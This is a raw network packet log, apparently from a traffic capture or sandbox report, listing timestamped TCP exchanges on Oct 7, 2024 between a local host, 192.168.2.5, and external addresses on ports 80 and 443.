Oct 7, 2024 03:15:36.479480028 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.479636908 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.479805946 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.479974985 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.479998112 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.480010986 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.480019093 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.483447075 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.483524084 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.483632088 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.483794928 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.483850956 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.522605896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522686005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522737026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522754908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522774935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522794962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522799969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522819042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522830009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522830009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522835016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522850990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522852898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522869110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522875071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522886038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522902012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522916079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522917032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522933960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522950888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.522958040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.522999048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.523017883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543171883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543185949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543210983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543227911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543242931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543248892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543275118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543287992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543291092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543307066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543323040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543354034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543540955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543566942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543581963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543591976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543639898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543654919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543673038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543689966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543701887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543706894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543728113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543759108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543759108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543796062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543844938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543859959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543886900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543903112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543916941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543916941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543919086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.543956995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.543956995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544024944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544039965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544055939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544073105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544075012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544109106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544137955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544174910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544189930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544205904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544229984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544270039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544389009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544419050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544435978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544439077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544451952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544469118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544476986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544488907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544492960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544508934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544509888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544524908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544528961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544542074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544553041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544558048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544573069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544574976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544591904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544608116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544620037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544625998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544636011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544651985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544652939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544667006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544675112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544686079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544692993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544698954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544713974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544718981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544749975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544750929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544768095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544776917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544794083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544807911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544809103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544822931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544826031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544842958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.544848919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544867992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.544893980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545541048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545557022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545572042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545586109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545598030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545612097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545614004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545629978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545644999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545644999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545663118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545670986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545706034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545767069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545783997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545798063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545806885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545821905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545859098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.545898914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.545926094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546066046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546093941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546109915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546118975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546125889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546134949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546149015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546149969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546174049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546183109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546199083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546211004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546216011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546231031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546232939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546250105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546261072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546272993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546291113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546299934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546315908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546319962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546333075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546346903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546360970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546366930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546380043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546387911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546395063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546407938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546411991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546426058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546430111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546444893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546452999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546463013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546468973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546480894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546485901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.546504974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.546525955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.562858105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.562913895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.562938929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.562952995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.562977076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.562978983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.562992096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563002110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563008070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563020945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563039064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563055038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563059092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563072920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563098907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563098907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563114882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563114882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563131094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563142061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563162088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563179970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563232899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563254118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563277960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563294888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563406944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563421965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563437939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.563451052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563468933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.563483953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.614682913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614696980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614720106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614737034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614751101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614767075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614782095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614799023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614808083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.614851952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.614864111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614892006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614907026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614922047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614938021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614945889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.614954948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614968061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.614973068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614986897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.614989042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.615031004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.615051031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634145975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634202957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634218931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634258986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634258986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634294033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634309053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634325981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634345055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634351015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634387970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634417057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634511948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634547949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634563923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634603024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634604931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634619951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634634018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634639978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634656906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634696960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634737015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634838104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634862900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634880066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634891987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634895086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634912014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634912968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634927988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634932041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634938955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634943962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634952068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.634970903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.634985924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635003090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.635005951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635030985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.635042906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635055065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.635057926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635066032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635071993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635078907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635103941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.635170937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.635379076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635401964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635410070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635546923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635562897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635591030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635606050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635620117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635633945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635648966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635677099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635690928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635705948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635720968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635735989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635751009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635783911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635807037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635823965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635838985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635855913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.635871887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636543036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636559010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636574984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636590958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636620045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636701107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636717081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636724949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636732101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636735916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636766911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636790037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636807919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636812925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636833906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636841059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636851072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636866093 CEST	49782	80	192.168.2.5	95.164.90.97
